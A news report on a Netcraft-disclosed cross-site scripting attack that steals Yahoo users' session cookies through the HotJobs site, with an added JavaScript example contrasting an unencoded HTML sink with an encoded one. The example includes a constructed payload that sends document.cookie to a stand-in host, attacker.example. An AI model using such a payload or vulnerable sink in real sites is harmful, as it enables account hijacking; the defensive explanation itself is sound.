Update: Cross-site scripting attack targets Yahoo user accounts

Posted by Wolfgang Gruener

Chicago (IL) - Netcraft today said that a Yahoo website is currently under attack by a script that steals authentication cookies from Yahoo users. The Internet analysis firm warns that the stolen cookies would let the attacker log in to the victims' Yahoo accounts, including Yahoo Mail, without knowing their passwords.

According to Netcraft, the attack exploits a cross-site scripting vulnerability on Yahoo's HotJobs site, which allows an attacker to inject malicious JavaScript into a HotJobs page by way of a crafted link. When a victim opens the link, the script reads the Yahoo authentication cookies in the victim's browser and sends them "to a different website in the United States", a site under the attacker's control where the captured account credentials are collected.

Netcraft said that it blocked a similar attack earlier this year that exploited a cross-site scripting vulnerability on Yahoo's ychat.help.yahoo.com website. In that case, the malicious code was served not from within the U.S. but from a server in Spain.

The company explained that "simply visiting the malign URLs on yahoo.com can be enough for a victim to fall prey to the attacker, letting him steal the necessary session cookies to gain access to the victim's email" and continued: "the victim does not even have to type in their username and password for the attacker to do this". A user who follows such a link is left on a blank web page, which is not much of a warning: most users would not take it as a sign that their session cookies, and with them access to their account, may just have been stolen.
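To make the mechanism concrete, here is an added example (not code from Netcraft, Yahoo or the HotJobs site) that models the pattern the article describes: a page reflects attacker-controlled input into HTML without encoding, the injected script reads document.cookie and beacons it to a third party. It shows the vulnerable sink beside a hardened one that HTML-encodes the value, and a small model of the browser's cookie exposure to show why the HttpOnly attribute, which the page does not mention, keeps a session cookie out of reach of this kind of script in browsers that honor it. The function names, the cookie names, the host attacker.example and the sample payload are all made up for the illustration.

```javascript
// Added example, not code from Netcraft or Yahoo. Names and payload are constructed.

// Vulnerable sink (hypothetical): the search query is pasted into HTML verbatim.
function renderSearchPageVulnerable(query) {
  return `<h1>Results for ${query}</h1>`;
}

// Context-appropriate output encoding for HTML text content.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, ch => map[ch]);
}

// Hardened sink: same template, but every untrusted value is encoded first.
function renderSearchPageHardened(query) {
  return `<h1>Results for ${htmlEncode(query)}</h1>`;
}

// Constructed payload of the kind a "malign URL" would carry in its query string:
// a script that reads the cookies and ships them off-site via an image request.
const COOKIE_THIEF =
  "<script>new Image().src='https://attacker.example/c?d='+" +
  "encodeURIComponent(document.cookie)</script>";

// Would the rendered HTML contain a script element the browser executes?
function containsScriptElement(html) {
  return /<script\b/i.test(html);
}

// Minimal model of how a browser exposes cookies to page script: parse Set-Cookie
// headers and build the string document.cookie would return. Cookies flagged
// HttpOnly are still stored and sent on requests, but are never handed to
// JavaScript, so a cookie thief running in the page cannot read them.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map(p => p.trim());
  const eq = pair.indexOf('=');
  const flags = new Set(attrs.map(a => a.split('=')[0].toLowerCase()));
  return {
    name: pair.slice(0, eq),
    value: pair.slice(eq + 1),
    httpOnly: flags.has('httponly'),
    secure: flags.has('secure'),
  };
}

function documentCookieView(setCookieHeaders) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter(c => !c.httpOnly)
    .map(c => `${c.name}=${c.value}`)
    .join('; ');
}

// Constructed sample: the same session cookie issued without and with HttpOnly.
const SESSION_WITHOUT_HTTPONLY = ['SID=s3cr3t; Path=/; Secure', 'prefs=compact; Path=/'];
const SESSION_WITH_HTTPONLY = ['SID=s3cr3t; Path=/; Secure; HttpOnly', 'prefs=compact; Path=/'];

if (typeof require !== 'undefined' && require.main === module) {
  console.log(containsScriptElement(renderSearchPageVulnerable(COOKIE_THIEF))); // true
  console.log(containsScriptElement(renderSearchPageHardened(COOKIE_THIEF)));   // false
  console.log(documentCookieView(SESSION_WITHOUT_HTTPONLY)); // SID=s3cr3t; prefs=compact
  console.log(documentCookieView(SESSION_WITH_HTTPONLY));    // prefs=compact
}
```

The two halves address the two ends of the attack: encoding untrusted output closes the injection point, and marking the session cookie HttpOnly limits what an injected script can steal if another injection point is missed. Neither replaces the other; the Secure flag in the sample shows why, since it does nothing against script reading the cookie.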

Netcraft said it has informed Yahoo of the latest attack, but did not know whether the attack was still active on the HotJobs website at the time of writing.

Yahoo issued the following statement in response to the attack:

"Security is an industry-wide issue and one that Yahoo! treats seriously. Yahoo! considers users' security as a priority and continues to take a hard look at how to effectively combat malicious behavior and protect its users.

The team was made aware of this particular Cross-Site Scripting issue yesterday morning (Sunday, Oct. 26) and a fix was deployed within a matter of hours. Yahoo! appreciates Netcraft's assistance in identifying this issue.

As a safety precaution, we recommend users change their passwords, should they still be concerned. Users should always verify via their Sign-in Seal that they are giving their passwords to Yahoo.com.

As part of Yahoo!'s ongoing efforts to educate consumers about fraud and online scams, Yahoo! offers a guide to online security at http://security.yahoo.com/.

Yahoo! also has a link for consumers to report scams at http://abuse.yahoo.com. Yahoo! customer care has a process for these issues and we are always evaluating these processes to ensure that these matters are escalated and handled appropriately."